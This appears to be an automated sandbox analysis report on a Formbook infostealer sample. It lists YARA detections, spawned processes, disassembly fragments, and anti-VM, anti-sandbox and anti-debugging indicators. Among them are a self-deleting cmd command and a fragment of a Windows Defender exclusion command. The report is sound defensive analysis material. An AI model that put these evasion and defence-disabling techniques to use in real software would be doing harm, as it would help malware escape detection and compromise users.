          Source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 457b22da_by_Libranalysis.exeStatic PE information: Section: U#j;F_` ZLIB complexity 1.00031723159
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@12/8
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\457b22da_by_Libranalysis.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: 457b22da_by_Libranalysis.exeReversingLabs: Detection: 31%
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeFile read: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe:Zone.IdentifierJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe 'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe'
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe C:\Users\user\Desktop\457b22da_by_Libranalysis.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe C:\Users\user\Desktop\457b22da_by_Libranalysis.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe'
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: 457b22da_by_Libranalysis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 457b22da_by_Libranalysis.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: 457b22da_by_Libranalysis.exe, 00000004.00000003.235743424.0000000001750000.00000004.00000001.sdmp, rundll32.exe, 00000009.00000002.484153846.0000000004A3F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 457b22da_by_Libranalysis.exe, rundll32.exe

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeUnpacked PE file: 0.2.457b22da_by_Libranalysis.exe.250000.0.unpack U#j;F_`:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
          Source: 457b22da_by_Libranalysis.exeStatic PE information: section name: U#j;F_`
          Source: 457b22da_by_Libranalysis.exeStatic PE information: section name:
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_04BFE0D2 pushad ; ret
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_053E1F08 pushad ; iretd
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_004161E7 push edi; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_004151B4 pushfd ; ret
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0041543B pushfd ; iretd
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_00415485 push edx; ret
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_00E3B9FA push ss; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_00E38118 push FFFFFF8Fh; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_00E3B346 push cs; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_00E3BB44 push ds; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_00E3BB56 push ds; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_00E3BB32 push ds; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_00E38485 push ds; ret
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_00E3ADE3 pushad ; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_00E3B5F8 push cs; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_00E3B5C2 push cs; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_00E3AE02 pushad ; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_00E3B610 push cs; retf
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_00E38FD4 push ds; ret
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0196D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0499D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_009051B4 pushfd ; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_009061E7 push edi; retf
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0090B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00905485 push edx; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0090B402 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0090B40B push eax; ret
          Source: initial sampleStatic PE information: section name: U#j;F_` entropy: 7.99977911602
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 457b22da_by_Libranalysis.exe PID: 4120, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000008F85E4 second address: 00000000008F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000008F897E second address: 00000000008F8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe TID: 5504Thread sleep time: -104854s >= -30000s
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe TID: 5808Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe TID: 808Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6460Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeThread delayed: delay time: 104854
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000005.00000000.257996526.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.257996526.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000005.00000000.263927638.000000000F596000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.256121125.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.257172140.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000005.00000002.493965122.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000005.00000000.257996526.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000005.00000000.257996526.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.258585279.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000005.00000000.251488161.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.256121125.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.256121125.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000005.00000000.256121125.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess information queried: ProcessInformation

          Anti Debugging:

          barindex
          Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)Show sources
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 0_2_00C91660 CheckRemoteDebuggerPresent,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01942990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0193C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01942581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01942581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01942581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01942581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01912D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01912D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01912D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01912D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01912D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01941DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01941DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01941DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019C8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019A41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01919100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01919100 mov eax, dword ptr fs:[00000030h]
